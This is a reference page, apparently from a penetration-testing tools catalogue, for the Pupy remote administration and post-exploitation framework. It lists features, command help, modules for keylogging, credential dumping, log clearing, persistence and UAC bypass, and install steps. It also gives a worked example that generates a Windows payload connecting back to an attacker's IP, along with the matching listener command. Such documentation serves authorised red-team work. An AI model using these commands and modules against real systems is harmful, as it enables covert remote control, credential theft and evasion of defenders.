Pupy
Pupy Description
Pupy is an open-source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in Python.
Pupy is a cross-platform, multi-function RAT and post-exploitation tool mainly written in Python. It follows an all-in-memory execution model and leaves a very low footprint. Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote Python code, Python packages and Python C extensions from memory.
Features:
- Windows payload can load the entire Python interpreter from memory using a reflective DLL.
- Pupy does not touch the disk.
- Can be packed into a single .py file and run without any dependencies other than the python standard library on all OSes.
- PyCrypto gets replaced by pure Python AES & RSA implementations when unavailable.
- Reflectively migrate into other processes.
- Remotely import pure python packages (.py, .pyc) and compiled python C extensions (.pyd, .so) from memory.
- Imported python modules do not touch the disk.
- Easily extensible, modules are simple to write and are sorted by os and category.
- Modules can directly access python objects on the remote client using rpyc.
- Access remote objects interactively from the pupy shell and get auto-completion of remote attributes.
- Communication transports are modular and stackable. Exfiltrate data using HTTP over HTTP over AES over XOR, or any combination of the available transports.
- Communicate using obfsproxy pluggable transports.
- Execute noninteractive commands on multiple hosts at once.
- Commands and scripts running on remote hosts are interruptible.
- Auto-completion for commands and arguments.
- Custom config can be defined: command aliases, modules automatically run at connection, etc.
- Open interactive python shells with auto-completion on the all-in-memory remote python interpreter.
- Interactive shells (cmd.exe, /bin/bash, etc) can be opened remotely.
- Remote shells on Unix & Windows clients have a real tty with all keyboard signals working just like an SSH shell.
- Execute PE executables remotely and from memory.
- Generate payloads in various formats:
Format | Architecture | Short Name
---|---|---
Android Package | x86 & ARMv7 | apk
Linux Binary | x86 | lin_x86
Linux Binary | x64 | lin_x64
Linux Shared Object | x86 | so_x86
Linux Shared Object | x64 | so_x64
Windows PE Executable | x86 | exe_x86
Windows PE Executable | x64 | exe_x64
Windows DLL | x86 | dll_x86
Windows DLL | x64 | dll_x64
Python Script | x86 & x64 | py
PyInstaller | x86 & x64 | pyinst
Python Oneliner | x86 & x64 | py_oneliner
Powershell | x86 & x64 | ps1
Powershell Oneliner | x86 & x64 | ps1_oneliner
Ducky Script | N/A | rubber_ducky
- Deploy in memory from a single command line using python or powershell one-liners.
- Embed "scriptlets" in generated payloads to perform some tasks "offline" without needing network connectivity (e.g. start keylogger, add persistence, execute custom python script, check_vm, etc.)
- Multiple Target Platforms:
Platform | Support Status
---|---
Windows XP | Supported
Windows 7 | Supported
Windows 8 | Supported
Windows 10 | Supported
Linux | Supported
Mac OSX | Limited Support
Android | Limited Support
Homepage: https://github.com/n1nj4sec/pupy
Author: Nicolas VERDIER
License: AS IS
Pupy Help
gen Help
Usage:
gen [-f {client,py,pyinst,py_oneliner,ps1,ps1_oneliner,rubber_ducky,csharp,.NET,.NET_oneliner}] [-O {android,windows,linux,solaris}] [-A {x86,x64}] [-U] [-P PACKER] [-S] [-o OUTPUT] [-d] [-D OUTPUT_DIR] [-s SCRIPTLET] [-l] [-E] [--no-use-proxy] [--oneliner-nothidden] [--debug-scriptlets] [--debug] [--workdir WORKDIR] [{bind,auto_proxy,dnscnc,connect}] ...
Options:
positional arguments:
  {bind,auto_proxy,dnscnc,connect}
                        Choose a launcher. Launchers make payloads behave differently at startup.
  launcher_args         launcher options

optional arguments:
  -h, --help            show this help message and exit
  -f {client,py,pyinst,py_oneliner,ps1,ps1_oneliner,rubber_ducky,csharp,.NET,.NET_oneliner}, --format {client,py,pyinst,py_oneliner,ps1,ps1_oneliner,rubber_ducky,csharp,.NET,.NET_oneliner}
                        (default: client)
  -O {android,windows,linux,solaris}, --os {android,windows,linux,solaris}
                        Target OS (default: windows)
  -A {x86,x64}, --arch {x86,x64}
                        Target arch (default: x86)
  -U, --uncompressed    Use uncompressed template
  -P PACKER, --packer PACKER
                        Use packer when 'client' output format (default: )
  -S, --shared          Create shared object
  -o OUTPUT, --output OUTPUT
                        output filename
  -d <ATTEMPTS> <MIN SEC> <MAX SEC>, --delays-list <ATTEMPTS> <MIN SEC> <MAX SEC>
                        Format: <max attempts> <min delay (sec)> <max delay (sec)>
  -D OUTPUT_DIR, --output-dir OUTPUT_DIR
                        output folder (default: /root/.config/pupy/output)
  -s SCRIPTLET, --scriptlet SCRIPTLET
                        offline python scriptlets to execute before starting the connection. Multiple scriptlets can be privided.
  -l, --list            list available formats, transports, scriptlets and options
  -E, --prefer-external
                        In case of autodetection prefer external IP
  --no-use-proxy        Don't use the target's proxy configuration even if it is used by target (for ps1_oneliner only for now)
  --oneliner-nothidden  Powershell script not hidden target side (default: False)
  --debug-scriptlets    don't catch scriptlets exceptions on the client for debug purposes
  --debug               build with the debug template (the payload open a console)
  --workdir WORKDIR     Set Workdir (Default = current workdir)
listen Help
Usage:
listen [-h] [-l | -L | -a TRANSPORT [TRANSPORT_ARG1 ...] | -A TRANSPORT [TRANSPORT_ARG1 ...] | -r TRANSPORT]
Options:
  -h, --help            show this help message and exit
  -l, --list            show current listeners
  -L, --list-transports
                        show available transports
  -a TRANSPORT [TRANSPORT_ARG1 ...], --add TRANSPORT [TRANSPORT_ARG1 ...]
                        start listener
  -A TRANSPORT [TRANSPORT_ARG1 ...], --add-no-pproxy TRANSPORT [TRANSPORT_ARG1 ...]
                        start listener (ignore pproxy)
  -r TRANSPORT, --remove TRANSPORT
                        stop listener
connect Help
Usage:
connect [-h] -c <host:port> [-t {obfs3,http,ssl,ecm,tcp_cleartext,dfws,rsa,udp_secure,kc4,ec4,ws,scramblesuit,udp_cleartext,ssl_rsa}]
Options:
positional arguments:
  transport_args        Transport arguments: key=value key=value ...

optional arguments:
  -h, --help            show this help message and exit
  -c <host:port>, --host <host:port>
                        host:port of the pupy server to connect to. You can provide multiple --host arguments to attempt to connect to multiple IPs
  -t {obfs3,http,ssl,ecm,tcp_cleartext,dfws,rsa,udp_secure,kc4,ec4,ws,scramblesuit,udp_cleartext,ssl_rsa}, --transport {obfs3,http,ssl,ecm,tcp_cleartext,dfws,rsa,udp_secure,kc4,ec4,ws,scramblesuit,udp_cleartext,ssl_rsa}
                        The transport to use
sessions Help
Usage:
sessions [-h] [-i <filter>] [-g] [-k <id>] [-K] [-d <id>] [-D]
Options:
  -h, --help            show this help message and exit
  -i <filter>, --interact <filter>
                        change the default --filter value for other commands
  -g, --global-reset    reset --interact to the default global behavior
  -k <id>               Kill the selected session
  -K                    Kill all sessions
  -d <id>               Drop the connection (abruptly close the socket)
  -D                    Drop all connections
jobs Help
Usage:
jobs [-h] [-k <job_id> | -K <job_id>] [-l] [-p <job_id>]
Options:
  -h, --help            show this help message and exit
  -k <job_id>, --kill <job_id>
                        print the job current output before killing it
  -K <job_id>, --kill-no-output <job_id>
                        kill job without printing output
  -l, --list            list jobs
  -p <job_id>, --print-output <job_id>
                        print a job output
run Help
Usage:
run [-h] [-1] [-o OUTPUT] [-f] [-b] <module> ...
Options:
positional arguments:
  <module>              module
  <arguments>           module arguments

optional arguments:
  -h, --help            show this help message and exit
  -1, --once            Unload new deps after usage
  -o OUTPUT, --output OUTPUT
                        save command output to file. %t - timestamp, %h - host, %m - mac, %c - client shortname, %M - module name, %p - platform, %u - user, %a - ip address
  -f <client filter>, --filter <client filter>
                        filter to a subset of all clients. All fields available in the "info" module can be used. example: run get_info -f 'platform:win release:7 os_arch:64'
  -b, --background      run in background
Modules
CATEGORY | NAME | HELP
---|---|---
admin | shares | List Local And Remote Shared Folder And Permission
admin | ls | List System Files
admin | wmic | Query Wmi Using Wql
admin | psh | Load/Execute Powershell Scripts
admin | ssh | Ssh Client
admin | rfs | Mount Remote Fs As Fuse Fs To Mountpoint
admin | smbspider | Walk Through A Smb Directory And Recursively Search A String Into Files
admin | reg | Search/List/Get/Set/Delete Registry Keys/Values
admin | shell_exec | Execute Shell Commands On A Remote System
admin | logs | Show Logs (Or Try To Search Something)
admin | alive | Request To Send Keepalive Packets On Rpyc Level
admin | rdesktop | Start A Remote Desktop Session Using A Browser Websocket Client
admin | cp | Copy File Or Directory
admin | interactive_shell | Open An Interactive Command Shell With A Nice Tty
admin | rm | Remove A File Or A Directory
admin | smb | Copy Files Via Smb Protocol
admin | hibernate | Close Session During X Hours
admin | netstat | List Terminal Sessions
admin | drives | List Valid Drives In The System
admin | become | Become User
admin | sshell | Interactive Ssh Shell
admin | last | List Terminal Sessions
admin | rdp | Enable / Disable Rdp Connection Or Check For Valid Credentials On A Remote Host
admin | w | List Terminal Sessions
admin | getdomain | Get Primary Domain Controller
admin | cd | Change Directory
admin | date | Get Current Date
admin | pexec | Execute Shell Commands Non-Interactively On A Remote System In Background Using Popen
admin | ps | List Processes
admin | zip | Zip / Unzip File Or Directory
admin | mkdir | Create An Empty Directory
admin | dns | Retrieve Domain Name From Ip And Vice Versa
admin | clear_logs | Clear Event Logs
admin | psexec | Launch Remote Commands Using Smbexec Or Wmiexec
admin | pyexec | Execute Python Code On A Remote System
admin | beroot | Check For Privilege Escalation Path
admin | cat | Show Contents Of A File
admin | pyshell | Open An Interactive Python Shell On The Remote Client
admin | mv | Move File Or Directory
admin | display | Set Display Variable
admin | ip | List Interfaces
admin | sudo_alias | Write An Alias For Sudo To Retrieve User Password
admin | igd | Upnp Igd Client
admin | stat | Show A Bit More Info About File Path. Acls/Caps/Owner For Now
admin | http | Trivial Get/Post Requests Via Http Protocol
admin | x509 | Fetch Certificate From Server
admin | getppid | List Parent Process Information
admin | getpid | List Process Information
admin | services | List Services
admin | getuid | Get Username
admin | pwd | Get Current Working Dir
creds | loot_memory | Crawl Processes Memory And Look For Cleartext Credentials
creds | creddump | Download The Hives From A Remote Windows System And Dump Creds
creds | lazagne | Retrieve Passwords Stored On The Target
creds | mimipy | Run Mimipy To Retrieve Credentials From Memory
creds | memstrings | Dump Printable Strings From Process Memory For Futher Analysis
exploit | mimishell | Execute Mimikatz From Memory (Interactive)
exploit | mimikatz | Execute Mimikatz From Memory (Non-Interactive)
exploit | exploit_suggester | Exploit Suggester
exploit | shellcode_exec | Executes The Supplied Shellcode On A Client
exploit | impersonate | List/Impersonate Process Tokens
gather | keylogger | A Keylogger To Monitor All Keyboards Interaction Including The Clipboard
gather | hashmon | Try To Find Clear Text Passwords In Memory
gather | get_info | Get Some Informations About One Or Multiple Clients
gather | contacts | To Get Contacts
gather | isearch | Use Windows Search Index To Search For Data
gather | search | Walk Through A Directory And Recursively Search A String Into Files
gather | check_vm | Check If Running On Virtual Machine
gather | outlook | Interact With Outlook Session Of The Targeted User
gather | record_mic | Record Sound With The Microphone !
gather | pywerview | Rewriting Of Some Powerview's Functionalities In Python
gather | apps | To Interact Manage Applications
gather | call | To Get Call Details
gather | gpstracker | To Interact With Gps
gather | mouselogger | Log Mouse Clicks And Take Screenshots Of Areas Around It
gather | powerview | Execute Powerview Commands
gather | get_hwuuid | Try To Get Uuid (Dmi) Or Machine-Id (Dbus/Linux)
gather | webcamsnap | Take A Webcam Snap
gather | usniper | Globally Capture String Or Register During Execution At Specified
gather | cloudinfo | Retrieve Ec2/Digitalocean Metadata
gather | users | Get Interactive Users
gather | screenshot | Take A Screenshot
gather | ttyrec | Globally Capture Intput/Output To Tty. Compatible With Kernels
general | exit | Exit The Client On The Other Side
general | process_kill | Kill A Process
manage | upload | Upload A File/Directory To A Remote System
manage | edit | Edit Remote File Locally (Download->Edit->Upload)
manage | hide_process | Edit Current Process Argv & Env Not To Look Suspicious
manage | download | Download A File/Directory From A Remote System
manage | getprivs | Manage Current Process Privileges
manage | tasks | Get Info About Registered Background Tasks
manage | memory_exec | Execute A Executable From Memory
manage | lock_screen | Lock The Session
manage | duplicate | Duplicate The Current Pupy Payload By Executing It From Memory
manage | load_package | Load A Python Package Onto A Remote Client. Packages Files Must Be Placed In One Of The Pupy/Packages/<Os>/<Arch>/ Repository
manage | migrate | Migrate Pupy Into Another Process Using Reflective Dll Injection
manage | write | Write Short String To File
manage | env | List/Get/Set/Unset Client Environment Variables
manage | persistence | Enable / Disable Persistence
network | port_scan | Run A Tcp Port Scan
network | forward | Local/Remote Port Forwarding And Socks Proxy
network | tcpdump | Module To Reproduce Some Of The Classic Tcpdump Tool Functions
privesc | getsystem | Try To Get Nt Authority System Privileges
privesc | bypassuac | Be Carefull, Most Of Bypass Methods Are Detected By Av...
privesc | inveigh | Execute Inveigh Commands
privesc | privesc_checker | Linux Privilege Escalation Scripts
troll | text_to_speach | Use Android Text To Speach To Say Something
troll | vibrate | Activate The Phone/Tablet Vibrator
troll | msgbox | Pop Up A Custom Message Box
Usage Example Pupy
Create an executable client file (-f client) for the 64-bit version (-A x64) of Windows (-O windows) which, once launched, connects back (connect) to the attacker's computer at IP address 192.168.1.112, listening on port 43210 (--host 192.168.1.112:43210), using the HTTP-like transport (-t http):
gen -f client -O windows -A x64 connect --host 192.168.1.112:43210 -t http
Start a listener on the attacker's computer that waits for a connection over the HTTP-like transport (http) on port 43210:
listen -a http 43210
How to install Pupy
For details on installation, see the article ‘How to install Pupy’.
How to install Pupy in Kali Linux
sudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv
git clone --recursive https://github.com/n1nj4sec/pupy
cd pupy
python create-workspace.py -DG pupyw
sudo pip2 install rpyc==3.4.4
How to install Pupy in BlackArch
sudo pacman -S pupy
sudo pacman -Rdd python2-rpyc
sudo pip2 install rpyc==3.4.4
Pupy Screenshots